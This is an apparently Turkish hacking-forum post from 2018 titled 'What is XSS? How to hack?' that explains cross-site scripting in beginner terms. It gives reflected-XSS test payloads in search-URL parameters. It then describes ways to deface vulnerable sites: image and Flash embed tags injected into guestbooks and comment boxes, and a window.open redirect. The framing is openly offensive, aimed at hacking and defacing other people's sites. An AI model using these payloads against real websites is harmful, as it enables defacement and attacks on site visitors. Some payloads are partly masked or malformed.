XSS Açığı Nedir? Nasıl Hacklenir? (Basit)

'Web Güvenliği' forumunda Growzy tarafından 6 Şubat 2018 tarihinde açılan konu

  1. Growzy

    Growzy BANNED

    Mesaj:
    5
    Alınan Beğeniler:
    1
    Xss Nedir:

    XSS Cross Site Scripting olarak bilinen web uygulamalarında mevcut olan çok
    yaygın bir açıktır.XSS atak yapan kişinin zararlı kodlarını inject etmesine
    dayananır.Kullanıcıya yönelik saldırı yapabiliriz.Sql açığı gibi servera degil.


    Nasıl Hackleriz:

    **********alert("XSS")</script>

    Bu kod ile bir popup uyarı mesajı karşımıza çıkacaktır.Şimdi yukarda verdiğimiz
    dork örneği ile XSS saldırı tipini belirleyelim:

    http://site.com/search.php?q=**********alert("XSS")</script>

    Evet popup uyarısı geldi.
    XSS ile yapılan yanlışlardan bir tanesi herkesin sadece javascript kod inject
    edildiğini düşünmesi.Oysaki:

    http://site.com/search.php?q=<br><br><u>XSS</u>

    Bu inject çeşidindede bold yazısı ile de hata alabiliyoruz.

    XSS açıklarının nasıl çalıştığını anladık.Şimdi Deface yöntemleri üzerinde,
    duralım.

    İlk yöntemimiz Html tag’ı olarak bilinen <img > etiketi.XSS açığı var
    olan bir web sitesinin üzerine grafiğimizi bağlayabiliriz.

    <html><body><IMG src= "http://site/resim.png></body></html>

    Yukarda nedemek istediğimi verdiğim koda geçerli bir resim adresini girip
    uyguladığınız zaman anlarsınız.

    XSS kodumuzu pano yada ziyaretçi defteri yada yorum kutularına girdiğimiz
    zaman web site kullanıcıları burayı ziyaret ettiği zaman:

    <IMG src= "http://site.com/yourDefaceIMAGE.png">

    kodumuz ile resmin olduğu

    sayfaya yöneleceklerdir.


    Diğer bir yöntem flash video yöntemi.

    <EMBED src= "http://site.com/xss.swf">

    Kodlarımız ile ziyaretçilere eşsiz bir görsel şölen sunabiliriz.

    Yada yönlendirme kodu atabiliriz.

    **********window.open( "http://www.google.com/" )</script>


    Alıntıdır düzenleme yapılmıştır.
     

Bu Sayfayı Paylaş

Share